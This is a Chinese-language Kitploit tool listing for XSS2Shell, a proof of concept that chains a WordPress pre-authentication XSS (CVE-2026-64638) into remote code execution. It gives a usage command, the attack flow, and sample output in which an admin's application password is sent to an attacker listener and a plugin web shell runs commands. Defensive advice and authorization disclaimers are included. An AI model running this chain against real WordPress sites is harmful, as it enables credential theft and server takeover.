Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
XSS2Shell — Wordpress 预认证 XSS 到 RCE 漏洞利用 PoC(xss2shell 与 CVE-2026-64638) | Kitploit
工具/GitHubGitHub/wordsec/xss2shell
Payload生成漏洞利用Web应用程序漏洞利用后渗透利用Web安全渗透测试学习与教育
GitHubwordsec/xss2shell

XSS2Shell

Wordpress 预认证 XSS 到 RCE 漏洞利用 PoC(xss2shell 与 CVE-2026-64638)

查看仓库
71151个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

XSS2Shell

XSS2Shell 是针对 CVE-2026-64638 的教育性概念验证(PoC),演示了易受攻击的 WordPress 安装中预认证 XSS 问题的影响。在管理员明确参与的情况下,该 PoC 会捕获 WordPress 应用程序密码、发布临时页面、上传测试插件,并检查最终生成的 shell 端点能否执行命令。

技术背景:WordPress 预认证 XSS 到 RCE:CVE-2026-64638

仅限教育和授权测试。 请仅针对您拥有或已获得书面授权评估的 WordPress 站点运行此工具。请勿使用它来攻击第三方管理员或生产系统。

环境要求

  • Python 3.7 或更高版本
  • 一个可访问的 WordPress 测试安装
  • 一位能够登录目标站点并打开攻击者 URL 的管理员
  • 管理员浏览器到监听地址的网络连通性
  • 无需第三方 Python 包

用法

python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"

选项

选项必填描述
-t, --target是WordPress 基础 URL,包含 http:// 或 https://
-c, --command是shell 可用后要执行的命令
--lhost否要绑定并通告的监听 IP;默认为检测到的局域网 IP
--lport否监听端口;0 表示随机选择可用端口
--keep否保留已发布的内容,而不是删除临时页面

目标 URL 会自动规范化,因此末尾的斜杠并非必需。

操作流程

  1. 工具检查 /wp-login.php 是否可访问,并确认其看起来像 WordPress 登录页面。
  2. 它启动一个本地 HTTP 监听器并打印监听器 URL。
  3. 获得授权的管理员登录目标站点并打开该 URL。
  4. 浏览器流程请求一个应用程序密码,并将结果发送到监听器。
  5. PoC 使用捕获的凭据发布一个临时攻击者页面。
  6. 该页面使用管理员的会话上传测试插件。
  7. 工具验证 shell.php 并运行所请求的命令。

监听器必须能够被管理员的浏览器访问。NAT、防火墙、代理、弹窗拦截和混合内容规则都可能阻止浏览器流程完成。

示例输出

 __          __           _  _____           
 \ \        / /          | |/ ____|          
  \ \  /\  / /__  _ __ __| | (___   ___  ___ 
   \ \/  \/ / _ \| '__/ _` |\___ \ / _ \/ __|
    \  /\  / (_) | | | (_| |____) |  __/ (__ 
     \/  \/ \___/|_|  \__,_|_____/ \___|\___|
                                              
                                              
xss2shell & CVE-2026-64638 |  https://wordsec.net/ - Education Purpose Only


============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
    ->  http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
    ->  http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php

============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved

[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.

产物与清理

成功运行会将捕获的应用程序密码保存到 xss2shell_creds.json,以便在后续运行中复用。除非使用 --keep,否则临时发布的页面会在命令执行后自动删除。

当前 PoC 有意保留测试插件、shell 端点、应用程序密码和已保存的凭据。完成授权评估后,请手动从测试站点中移除它们,并在本地删除 xss2shell_creds.json。

请将凭据文件视为敏感信息,切勿将其提交到版本控制中。

防御建议

  • 将 WordPress 修补到不受 CVE-2026-64638 影响的版本。
  • 强制实施强管理员身份验证并启用 2FA。
  • 将插件安装和应用程序密码创建限制为受信任的角色。
  • 测试后审查管理员的应用程序密码、已发布的页面以及最近安装的插件。
  • 监控并阻止对插件上传和 REST 端点的意外请求。

许可证

使用本仓库中包含的许可证。

由 WordSec 制作

下载工具